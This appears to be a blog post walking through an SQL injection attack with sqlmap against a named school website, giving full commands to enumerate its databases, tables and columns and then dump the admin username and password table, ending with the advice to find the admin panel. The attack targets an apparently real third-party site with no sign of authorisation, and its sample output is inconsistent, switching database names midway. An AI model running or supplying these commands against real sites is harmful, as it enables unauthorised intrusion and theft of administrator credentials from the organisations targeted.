first of all we need a vulnerable target! here it is http://www.alliedschools.edu.pk/main_news.php?news_id=52 ok first step is to fatch the databases command will be like this one python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 –dbs here:- -u is stand for which is vulnerable to SQL injection and –dbs is used for fatching total databases in website

ok after completing the process of fataching the databases it will something like that available databases(8) [*]informtion_schema [*]alliedschools_web

now we are going to expoit database alliedschools_web and fatch the tables present in it
ok command will change a little bit :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables
here :-
-D and then name of the database from which we want to fatch tables and
--tables is for fatching total table present in the database
after processing we will get the tables present in database "alliedschools_web"

after processing we will get something like that Database: alliedschools_campus [18 Tables ] admin campus
now we are going to fatch the cloumns from table admin of database alliedschools_campus
command is :-
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns

now we will get something like this
Database: alliedschools_campus
Table : admin
[12 columns ]
admin_password
admin_username
admin_email

This is the last command to get the admin username and password
command is
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password, admin_username --dump

and after finishing process we will get something like that
Database: alliedschools_campus
Table : admin
[6 entries]
admin_password admin_username
$erver admin
...... ......
Now You Have admin Password of website, Find admin panel


0 comments:
Post a Comment